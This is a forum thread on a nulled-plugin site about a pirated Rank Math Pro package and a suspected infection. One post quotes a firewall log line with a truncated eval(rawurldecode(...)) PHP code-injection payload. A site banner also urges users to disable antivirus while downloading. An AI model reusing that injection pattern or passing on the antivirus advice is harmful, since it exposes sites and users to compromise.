• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Rank Math Pro - BEST WordPress SEO Tool

Rank Math Pro - BEST WordPress SEO Tool v.3.0.60

No permission to download
Overview Updates (112) Reviews (54) History Discussion
Unreal_NFS said:
.zip the RankMath free and Pro folders from your server and upload it here on the thread. Do mention --- that the package is corrupt.
Click to expand...
11/Mar/24 20:10:18 #1708853 CRITICAL 155 91.240.118.111 POST /wp-content/plugins/filebird-pro/vendor/enshrined/svg-sanitize/src/Exceptions/home_new.php - Code injection - [POST:If-Unmodified-Since = eval(rawurldecode("%20%24path%20%3D%20%27/home/microhost.gr/public_html/wp-content/plugins/seo-by-rank-math/includes/modules/redirections/class-debugger.php%27%3B%20%24ft%20...] - microhost.gr

That is from the log. Its the first that i have in my log. If you read it carefully it says that (seo-by-rank-math/includes/modules/redirections/class-debugger.php) is infecting with bad code the filebird-pro/vendor/enshrined/svg-sanitize/src/Exceptions/home_new.php.
The eval was the bad code and in pic, you will see in the last line of the rankmath. All started from the infected rankmath by here.
My log is full of this tactic meaning that rankmath make code injection in several files.
 

Attachments

  • RankMath code.jpeg
    RankMath code.jpeg
    265.8 KB · Views: 45
  • NinjaFirewall(1).jpeg
    NinjaFirewall(1).jpeg
    451.3 KB · Views: 44
  • NinjaFirewall(2).jpeg
    NinjaFirewall(2).jpeg
    459.2 KB · Views: 44
uninstall rankmath free+pro completely from the site and also make sure that the rankmath folder is completely deleted from the site after it is deleted, reinstall rankmath with the newly downloaded package from the babiato.

See, whether it helps.

Do this only after securing the server by following what I had detailed in the earlier posts.
 
Emre said:
I don't understand why you are arguing with me? Everyone who comes to Babiato has different goals. I support. I am not downloading files.

Then keep using it.
Click to expand...
I'm not argue with you but your words brings whole nulled items under "suspicion" so I'm agains that argument. If you just hang out here no problem at all but you can not decide/say how nulled items "dangerous" or not even if you havent try before it.
 
Dimitris said:
11/Mar/24 20:10:18 #1708853 CRITICAL 155 91.240.118.111 POST /wp-content/plugins/filebird-pro/vendor/enshrined/svg-sanitize/src/Exceptions/home_new.php - Code injection - [POST:If-Unmodified-Since = eval(rawurldecode("%20%24path%20%3D%20%27/home/microhost.gr/public_html/wp-content/plugins/seo-by-rank-math/includes/modules/redirections/class-debugger.php%27%3B%20%24ft%20...] - microhost.gr

That is from the log. Its the first that i have in my log. If you read it carefully it says that (seo-by-rank-math/includes/modules/redirections/class-debugger.php) is infecting with bad code the filebird-pro/vendor/enshrined/svg-sanitize/src/Exceptions/home_new.php.
The eval was the bad code and in pic, you will see in the last line of the rankmath. All started from the infected rankmath by here.
My log is full of this tactic meaning that rankmath make code injection in several files.
Click to expand...
I understand completely your situation and you should find of course who is a guilty one. But as you provided log and infected files it seem that "free version" file has been corrupted. And it's common issue because most of SEO plugins has "redirection" feature and hackers uses this file because it's easy to redirect pages instead of modifying htaccess or injected another php files. Also users can not understand what happened.
I was used Yoast and I'm switching to Rankmath project by project (I'm control freak) and I just check free and pro files but none of any files has been corrupted or injected.

As @Unreal_NFS mentioned before please check your linux system it's really hard to maintenance even if you are install any control panel.
 
  • Like
Reactions: Unreal_NFS, DATANET and Valentina
Dimitris said:
No No my friend! You misunderstanding me. I use nulled themes and plugins from here and i will keep doing because i don believe that the problems are always from the nulled files. But sometimes...
I dont decide if something is dangerous and thats why i have the security plugins to tell what is dangerous and take actions. So stop blaim me that i did something wrong because i never said that the whole babiato is under suspicious, just the plugin. In the contrary you are the first that said that.

Read carefully the posts. When i saw that in my server, the first thing after the cleaning i did was to come here and report what i found. Are you telling me that everytime that happens like that to do what? Dont waste my time to come here and tell that? And what if something has really bad code? Let it go and let the other users know nothing about it? Even if it is false alarm like probably my case?
Click to expand...
I know mate I did not mention you :)
 
guguk said:
I understand completely your situation and you should find of course who is a guilty one. But as you provided log and infected files it seem that "free version" file has been corrupted. And it's common issue because most of SEO plugins has "redirection" feature and hackers uses this file because it's easy to redirect pages instead of modifying htaccess or injected another php files. Also users can not understand what happened.
I was used Yoast and I'm switching to Rankmath project by project (I'm control freak) and I just check free and pro files but none of any files has been corrupted or injected.

As @Unreal_NFS mentioned before please check your linux system it's really hard to maintenance even if you are install any control panel.
Click to expand...
Because you are control freak lets tell you what im knowing so far. If that was happening to everyone about that, will thought the same like me especially with these logs and times and etc.
After of more searching, now i believe that weak password of admins gave access to happened this and the first thing that the intruder did, was to infect the rankmath redirections.
So the most probably is that the rankmath is clean and the alarm by me was false. But i would feel more secure if someone said that check that and its ok like you said that you just check these and are clean.
And now with your checks i can verify that was FALSE ALARM 100%.
 
Dimitris said:
Because you are control freak lets tell you what im knowing so far. If that was happening to everyone about that, will thought the same like me especially with these logs and times and etc.
After of more searching, now i believe that weak password of admins gave access to happened this and the first thing that the intruder did, was to infect the rankmath redirections.
So the most probably is that the rankmath is clean and the alarm by me was false. But i would feel more secure if someone said that check that and its ok like you said that you just check these and are clean.
And now with your checks i can verify that was FALSE ALARM 100%.
Click to expand...
Not worry at all, I'm using wp-cerber plugin for security which is not popular rather than ninjafirewall and when I scan my website it's giving a lot of "suspicious" file name but most of them false.
Dimitris said:
Im really sorry. I didnt read your post second time before i respond. Im Sorry! Do you want to delete my post that was unfair by me to you?
Click to expand...
No problem mate, I understand your situation if you have a baby; sleepless dady syndrome :)
 
  • Like
Reactions: Unreal_NFS and Valentina
guguk said:
I'm not argue with you but your words brings whole nulled items under "suspicion" so I'm agains that argument. If you just hang out here no problem at all but you can not decide/say how nulled items "dangerous" or not even if you havent try before it.
Click to expand...
I am against any content that will harm our efforts. Why are you taking this personally? You're still trying to argue with me. This is the last message I will give you. What I will do or not do here, what I will decide or not, is none of your business. I share and move on like other users. Please mind your business. Not with me!
 
Emre said:
You're still trying to argue with me.
Click to expand...
I'm not argue with you even with anyone if you are "read" my post, I just taking care "whole" users to be safe with download any file on babiato, capito?
Emre said:
I am against any content that will harm our efforts.
Click to expand...
What a stupid idea :) If you think "nulled" items harm your efforts so why you are sharing your file, it may required null to using everyone in future? So should we trust your file? How we trust your file?
Emre said:
Why are you taking this personally?
Click to expand...
Because I'm sharing my files too and all of them are "safe" but any users who contribute on babiato take personally if you say "Here's why you should never use null versions!" because you are "blaming the babiato".

And last word, if you had follow up on what @Dimitris said "this is a false alarm", do you first apologize to me and apologize to the contributors?
 
  • Angry
  • Like
Reactions: Unreal_NFS and Emre
Moderators, take action! Everyone is already tired of this spam flood about viruses!! Great plugin, good nulled. Not only me, but many people are tired of this garbage in posts that contain a plugin with a virus!! Please clean up the comments and delete these idiots who write all sorts of nonsense!!
 
  • Like
Reactions: Groot, kalios and purpletiger
Alanon said:
I wanted to say that the fact that you are the only one having a problem with that virus indicates that the fault is not in the Rank Mat plugin but somewhere else.
Click to expand...
You are absolutely right about that but the first signs saw to me that the rankmath was the problem. So until to figure it out i thought that the best for all of us was to come here and say it.
So until someone to verify that the rankmath is not the problem, should everyone to be a little more carefull. To say that no other have problem with something is a little difficult to say because you can have bad plugin but your security doesnt allow to do bad things. So you could have something corruptied but you never know that. And one line of code doesnt mean that your security will save you because you think its a false alarm so you will ignore it. If you read some previous post then you will see that someone said that his security has many false alarms. Are you able to verify those alarms are fake? Me not. I need time to investigate it and after that i will come here and i will say to you that 100% its flse or not.

So the phrase -you are the only one having that- for me its tells me nothing. You could have problems but you are not able to even see them. You think that you are ok but are you so sure? You could probably have bad code but nothing happened because of your security. The security plugins dont search the data integrity of the paid themes or plugins so you are never safe by the paid plugins.
 
Valentina said:
Moderators, take action! Everyone is already tired of this spam flood about viruses!! Great plugin, good nulled. Not only me, but many people are tired of this garbage in posts that contain a plugin with a virus!! Please clean up the comments and delete these idiots who write all sorts of nonsense!!
Click to expand...
Yes exactly!!! Moderators slap all of them immediately. Delete not only their posts but also their facebook tiktok etc accounts. Shame on these idiots that waste their times to secure the nulled plugins so you can take those plugins for free.

I have a solution for you. Read nothing and just push the download button. Its easy. Click...
 
Dimitris said:
Yes exactly!!! Moderators slap all of them immediately. Delete not only their posts but also their facebook tiktok etc accounts. Shame on these idiots that waste their times to secure the nulled plugins so you can take those plugins for free.

I have a solution for you. Read nothing and just push the download button. Its easy. Click...
Click to expand...

Yes, everyone is already tired of your whining!!!!!!!!!!!!!!!!!! Don't like this forum and plugin..? Leave this site!!!!!!!!!!!!!!!!!!!!👹:mad::devilish::devilish:

 
Valentina said:

Yes, everyone is already tired of your whining!!!!!!!!!!!!!!!!!! Don't like this forum and plugin..? Leave this site!!!!!!!!!!!!!!!!!!!!👹:mad::devilish::devilish:

Click to expand...

Dimitris said:
Ooo how cute! So many emojis only for me? 💏 👩‍❤️‍👩
Click to expand...

No need to fight each other mates.
There have no issue at all and please calm down.

We can enjoy with Rankmath plugin without any issue, no matter else.
 
  • Like
Reactions: Dimitris and Unreal_NFS
You must log in or register to reply here.

Similar threads

kibriachowdhury
[REQ] Rankie - Wordpress Rank Tracker Plugin v1.7.2 (Nulled/GPL)
Replies
0
Views
1K
Other Plugin
kibriachowdhury
kibriachowdhury
Babak
WP Review Pro - Create Reviews Easily & Rank Higher In Search Engines
Replies
60
Views
11K
Other Plugin
iGarry
I
G
ePoll PRO - WordPress Poll Maker & Voting Plugin
Replies
1
Views
87
Other Plugin
Babak
Babak
plfiumi
PPOM Pro for WooCommerce
Replies
3
Views
160
Other Plugin
attila729
A
Judge
Fonts Plugin Pro - Google Fonts for WordPress
Replies
3
Views
293
Other Plugin
Judge
Judge

Latest posts

Forum statistics

Threads
79,450
Messages
1,142,737
Members
248,378
Latest member
tani

Share this page

Share this page
Top Bottom
Back
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock